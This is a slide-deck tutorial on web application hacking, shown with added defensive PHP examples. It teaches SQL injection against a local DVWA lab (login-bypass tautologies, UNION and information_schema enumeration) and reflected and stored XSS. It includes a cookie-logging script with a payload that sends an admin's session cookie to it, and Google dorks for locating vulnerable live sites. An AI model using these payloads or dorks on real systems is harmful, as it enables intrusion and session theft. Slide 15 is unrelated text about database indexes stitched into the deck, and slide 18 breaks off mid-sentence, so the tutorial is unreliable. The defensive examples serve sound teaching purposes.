
Web application hacking by noah



Web application hacking, cracking, cross site scripting, XSS, CSS, form tampering, SQL injection, shell script

Published in: Education

  1. Web Application Hacking By Noah Franklin J
  2. What is a Web Application?
     A web application is an application that is accessed by users over a network such as the Internet or an intranet.

     Web Application Architecture:
     Although web applications can be classified as programs running on a web browser, web applications generally have a three-tier construction, as shown in Figure 1.
     1) Presentation Tier: receives the user's input data and shows the result of the processed data to the user. It can be thought of as the Graphical User Interface (GUI). Flash, HTML, JavaScript, etc. are all part of the presentation tier, which directly interacts with the user.
     2) CGI Tier: also known as the Server Script Process, it is located between the presentation tier and the database tier. The data entered by the user is processed and stored in the database. The database sends the stored data back to the CGI tier, which finally sends it to the presentation tier for viewing. Therefore, the data processing within the web application is done at the CGI tier. It can be programmed in various server script languages such as JSP, PHP, ASP, etc.
     3) Database Tier: stores and manages all of the processed user input data. All sensitive data of web applications is stored and managed within the database. The database tier is responsible for the access of authenticated users and the rejection of malicious users from the database.

     Web Application Setup
  3. Reasons for Attacking Web Apps
     Web Application Threats
  4. Web Application Threats
  5. SQL Injection
  6. SQL-Injection Attacks
     SQL-injection vulnerabilities and attacks occur between the Presentation tier and the CGI tier. Most vulnerabilities are introduced accidentally in the development stage. The data flow of each tier using normal and malicious input data is shown in Figure 2. It depicts the user's authentication step. When an authenticated user enters their ID and password, the Presentation tier uses the GET and POST methods to send the data to the CGI tier. The SQL query within the CGI tier connects to the database and processes the data.

     When a malicious user enters an ID such as 1' or '1=1'--, the query within the CGI tier becomes

         SELECT * FROM user WHERE id='1' or '1=1'--' AND password='1111';

     After the --, the rest of the statement becomes a comment, and because or '1=1' is always true, the authentication step is bypassed. SQL injection attacks are malicious data that changes the normal SQL query into a malicious SQL query and allows anomalous database access and processing. Most web applications use data filters to prevent these kinds of SQL injection attacks. However, there are many methods of SQL injection that can bypass data filters, which makes it difficult to effectively defend the database from attacks. Therefore, a more effective way of detecting and preventing SQL injection attacks is necessary.

     Types of SQL Injection
     • Direct SQL Injection
  7. Ex: True Conditions (Tautology) like [ ' or 1=1 -- ]
     • In-Direct SQL Injection
       Ex: Query based injection, Blind Injection, String Based Injection, Character Based Injection, Error Based SQLi, Error based Double Query Injection, XML Injection

     Direct SQL Injection Understanding

         if ((username == "franky") && (password == "12345"))
             printf("Welcome to Email ");
         else {
             printf("Invalid Username or password");
         }

     Explanation:
     The code above means that if the username and password both match the database, access to the email is granted with the message "Welcome to Email"; otherwise an error message such as "Invalid Username or password" is shown.

     Some Modification in Code

         if ((username == a' or 1=1-- ) && (password == a' or 1=1--))
  8.         printf("Welcome to Email ");
         else {
             printf("Invalid Username or password");
         }

     Pure dynamic SQL serves as the most common form of SQL injection attacks:

         sqlString = "SELECT… From [myTable] WHERE name = '" . myInputValue . "' ";

     Explanation
     With the SQL injection input, the same login code also logs into the email and shows the welcome message.

     Indirect SQL Injection Understanding
     Requirements
  9. Download Xampp or Wamp
     Google dorks to find vulnerable websites to perform SQL injection
     Some of the SQL dorks are:
         inurl : php?id =
         inurl : aspx?id
         inurl: asp?id=
     The pictures below help to understand the serious issues of SQL injection.

     How to install Wamp and DVWA
     Download these from the link given above and install Wamp, then extract the DVWA rar file, copy that folder and paste it into C:\wamp\www
     Now start the Wamp server, open a web browser and check localhost/dvwa
     How to create a database: click Create Database
  10. Then click DVWA Security
      Login Username: admin & Password: password
  11. Change Security to Low
      Click SQL Injection
  12. Enter 1 and submit, and see the response from the database in the browser: it shows that ID 1 belongs to the Admin account.
      Increase the number to 2, 3, 4, etc. (in the picture below it is 5) and see the response of the database: it shows that ID 5 belongs to Bob.
      Type 6 and submit, and see the response: ID 6 does not belong to anyone.
  13. Enter a single quote ( ' ) on the right-hand side (next to ID=1)
      Ex: localhost/dvwa/vulnerabilities/sqli/?id=1'
      Type Order by 1 -- comment in the browser and hit Enter
      The ORDER BY clause allows you to sort the records in your result set. The ORDER BY clause can only be used in SELECT statements. We need to find how many columns are present in this website.
      Increase to Order by 2-- and so on until we get an error message like Unknown clause
  14. The UNION operator is used to combine the result sets of two or more SELECT statements. Notice that each SELECT statement within the UNION must have the same number of columns. The columns must also have similar data types. Also, the columns in each SELECT statement must be in the same order.
      Use union all select 1,2 because the database of this website contains only 2 columns:
      localhost/dvwa/vulnerabilities/sqli/?id=-1 union all select 1,2 --
  15. Yes, in this case Id is the field on which I have defined the clustered index.
      If the index is ID DESC then what..
      And yes, it would be nice to know how the performance would be affected if:
      Id is a clustered index + primary key.
      Id is a clustered index and not primary key.
      Id is a non clustered index ASC + primary key.
      Id is a non clustered index ASC and not primary key.
      Id is a non clustered index DESC + primary key.
      Id is a non clustered index DESC and not primary key.
      Id is just AutoIncrement

      To check the version of the SQL use @@version
      To check the database of that website use database()
  16. To check the table names present on this website use table_name from information_schema.tables
      table_name is the default column name in SQL for the table name.
      INFORMATION_SCHEMA is the information database, the place that stores information about all the other databases that the MySQL server maintains. Inside INFORMATION_SCHEMA there are several read-only tables. They are actually views, not base tables, so there are no files associated with them, and you cannot set triggers on them. Also, there is no database directory with that name.
      Although you can select INFORMATION_SCHEMA as the default database with a USE statement, you can only read the contents of tables, not perform INSERT, UPDATE, or DELETE operations on them.
  17. In the same way, for columns use column_name from information_schema.columns
      To select a particular table use column_name where table_name=table name
  18. The password is in MD5 hash encryption; to decrypt use
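
The login query from slides 6 to 8, written once with string concatenation and once with a bound parameter, as an added example that is not part of the original slides. It assumes PHP with the pdo_sqlite extension; the in-memory table, the function names and the `password_hash()` storage (in place of the MD5 mentioned on slide 18) are constructed for illustration.

```php
<?php
// Added example. Table contents and function names are constructed for this demo.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE user (id TEXT PRIMARY KEY, password TEXT NOT NULL)");
$db->prepare("INSERT INTO user (id, password) VALUES (?, ?)")
   ->execute(['franky', password_hash('12345', PASSWORD_DEFAULT)]);

// The slide's pattern: input is concatenated into the SQL text, so quote
// characters in the input become part of the statement itself.
function login_concatenated(PDO $db, string $id, string $password): bool
{
    $sql = "SELECT * FROM user WHERE id='" . $id . "' AND password='" . $password . "'";
    return $db->query($sql)->fetch() !== false;
}

// Hardened form: the statement text is fixed and the input is bound as data.
// The stored value is a salted password_hash() digest, checked in PHP.
function login_prepared(PDO $db, string $id, string $password): bool
{
    $stmt = $db->prepare("SELECT password FROM user WHERE id = ?");
    $stmt->execute([$id]);
    $hash = $stmt->fetchColumn();
    return $hash !== false && password_verify($password, $hash);
}

$tautology = "1' or '1=1'--";   // the ID value quoted on slide 6

$cases = [
    'concatenated query, injected id' => login_concatenated($db, $tautology, '1111'),
    'prepared query, injected id'     => login_prepared($db, $tautology, '1111'),
    'prepared query, valid login'     => login_prepared($db, 'franky', '12345'),
    'prepared query, wrong password'  => login_prepared($db, 'franky', 'wrong'),
];
foreach ($cases as $label => $accepted) {
    printf("%-34s %s\n", $label, $accepted ? 'accepted' : 'rejected');
}
```

With the bound parameter the whole input string is compared against the `id` column as a value, so the quote and comment characters never reach the SQL parser.
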
  20. Cross Site Scripting
  21. What is Cross Site Scripting?
      Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications, such as web browsers through breaches of browser security, that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.

      Types of Cross Site Scripting
      XSS attacks are broadly classified into 2 types
      • Non-Persistent (Reflection Attack)
      • Persistent (Stored Attack)
      • DOM Based XSS

      Non-Persistent XSS Attack
      A non-persistent attack requires a user to visit a link specially crafted by the attacker. When the user visits the link, the crafted code is executed by the user's browser. Let us understand this attack better with an example.

      Example for Non-Persistent XSS
      index.php:

          <?php
          // Vulnerable on purpose: the request parameter is echoed without encoding.
          $name = $_GET['name'];
          echo "Welcome $name<br>";
          echo '<a href="">Click to Download</a>';
          ?>

      Now the attacker will craft a URL as follows and send it to the victim:

          index.php?name=guest<script>alert('attacked')</script>

      When the victim loads the above URL into the browser, he will see an alert box which says 'attacked'. Even though this example doesn't do any damage other than the annoying 'attacked' pop-up, you can see how an attacker can use this method to do several damaging things.
  22. Again using localhost DVWA, performing an XSS reflection attack
      Enter any name and submit. Check the response of the website.
  23. For example, I used my name, Noah Franklin. See the response of the website: it says Hello Noah Franklin.
      Replace Noah Franklin with <script>alert("hacked")</script>
      The alert() method displays an alert box with a specified message and an OK button.
  24. Persistent XSS Attack
      In a persistent attack, the code injected by the attacker is stored in a secondary storage device (mostly in a database). The damage caused by a persistent attack is greater than that of a non-persistent attack. Here we will see how to hijack another user's session by performing XSS.

      Session
      HTTP is a stateless protocol, which means it won't maintain any state with regard to the request and response. All requests and responses are independent of each other. But most web applications don't need this. Once the user has authenticated himself, the web server should not ask for the username/password on the next request from the user. To do this, they need to maintain some kind of state between the web browser and the web server, which is done through "sessions".
      When the user logs in for the first time, a session ID is created by the web server and sent to the web browser as a "cookie". All subsequent requests to the web server are based on the "session id" in the cookie.

      Examples for Persistent XSS Attack
      The sample web application given below, which demonstrates the persistent XSS attack, does the following:
      • There are two types of users: "Admin" and "Normal" user.
      • When the "Admin" logs in, he can see the list of usernames. When "Normal" users log in, they can only update their display name.
  25. Code
      Coo.php

          <?php
          // Logs the cookie value passed in ?c= together with request metadata.
          $cookie = $_GET['c'];
          $ip = getenv('REMOTE_ADDR');
          $date = date("H:i dS F");
          $referer = getenv('HTTP_REFERER');
          $fp = fopen('cookies', 'a');
          fwrite($fp, "IP: " . $ip . "\r\n");
          fwrite($fp, "Date: " . $date . "\r\n");
          fwrite($fp, "Referer: " . $referer . "\r\n");
          fwrite($fp, "Cookie: " . $cookie . "\r\n***************************************************************\r\n");
          fclose($fp);
          header("Location:"); /* USE IF WANT TO REDIRECT TO ANOTHER PAGE */
          ?>

      Put the code below into the Message box:

          <a href=javascript:void(document.location='http://localhost/coo.php?c='+escape(document.cookie));> </a>
  26. Check the picture below: it was logged in as admin in Firefox.
      Once the admin clicks the link "Visit the useful tips section", it will reload and save the cookie.
      In the Chrome browser, logged in as a normal user.
      The stored cookie of the admin is in the picture below.
  27. We logged in as admin in the Chrome browser
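
The server-side controls that stop the reflected case on slide 21 and the cookie read on slides 24 to 26, as an added example that is not part of the original slides. Function names and the sample input are constructed; the array form of `session_set_cookie_params()` assumes PHP 7.3 or later.

```php
<?php
// Added example. Function names and the sample input are constructed.

// Output encoding for the reflected case: the value is HTML-escaped where it is
// written into the page, so markup inside it is displayed instead of parsed.
function render_welcome(string $name): string
{
    $safe = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "Welcome {$safe}<br>";
}

// Session cookie hardening for the stored case: HttpOnly hides the cookie from
// document.cookie, Secure limits it to HTTPS, SameSite limits cross-site sends.
function session_cookie_options(): array
{
    return [
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ];
}

// Response headers that block inline script even if one encoding step is missed.
function security_headers(): array
{
    return [
        "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'",
        'X-Content-Type-Options: nosniff',
    ];
}

if (PHP_SAPI !== 'cli') {
    session_set_cookie_params(session_cookie_options());
    session_start();
    foreach (security_headers() as $h) {
        header($h);
    }
    $name = $_GET['name'] ?? 'guest';
    echo render_welcome(is_string($name) ? $name : 'guest');
} else {
    // Constructed input: the query-string value from the crafted URL on slide 21.
    echo render_welcome("guest<script>alert('attacked')</script>"), PHP_EOL;
}
```

The same `htmlspecialchars()` call applied when a stored message is rendered turns the anchor tag from slide 25 into visible text, and the HttpOnly flag keeps the session ID out of `document.cookie` if a script does run.
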
  28. Brute Force
  31. Uploading Shell
  32. Upload any image file and check whether the site allows us to upload a shell file
  33. Cross Site Request Forgery
  37. Form Tampering
  38. Use the Mozilla Tamper Data add-on. The website contains a loophole which allows me to change the cost of the product.
      1. Open the Mozilla web browser
      2. Open the website
      3. Options -> Tamper Data
      4. Start tamper and hit the Add to cart button; it will allow you to change the cost of the product, as shown in the pictures below
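
The server-side check that closes the loophole described on slide 38, as an added example that is not part of the original slides. The catalogue, the form field names (`sku`, `qty`, `price_cents`) and the function name are constructed for illustration.

```php
<?php
// Added example. The catalogue, field names and function name are constructed.
const CATALOG = [
    'sku-1001' => ['name' => 'Keyboard', 'price_cents' => 4999],
    'sku-1002' => ['name' => 'Mouse',    'price_cents' => 1999],
];

// Builds a cart line from a submitted form. Only the product id and quantity are
// taken from the request; the price always comes from the server-side catalogue.
function cart_line_from_request(array $post): array
{
    $sku = is_string($post['sku'] ?? null) ? $post['sku'] : '';
    if (!array_key_exists($sku, CATALOG)) {
        throw new InvalidArgumentException('unknown product');
    }
    $qty = filter_var($post['qty'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 99]]);
    if ($qty === false) {
        throw new InvalidArgumentException('invalid quantity');
    }
    $price = CATALOG[$sku]['price_cents'];

    // A client-supplied price that disagrees with the catalogue is a tampering
    // signal worth logging; it never influences the total.
    $sent = $post['price_cents'] ?? null;
    $tampered = $sent !== null && (!is_scalar($sent) || (string) $sent !== (string) $price);
    if ($tampered) {
        error_log("price mismatch for {$sku}: client sent "
            . json_encode($sent) . ", catalogue has {$price}");
    }
    return ['sku' => $sku, 'qty' => $qty, 'unit_cents' => $price,
            'total_cents' => $price * $qty, 'tampered' => $tampered];
}

// Constructed request body: the price field was edited in transit to 1 cent.
$line = cart_line_from_request(['sku' => 'sku-1001', 'qty' => '2', 'price_cents' => '1']);
printf("%s x%d = %d cents (tampered: %s)\n",
    $line['sku'], $line['qty'], $line['total_cents'], $line['tampered'] ? 'yes' : 'no');
```
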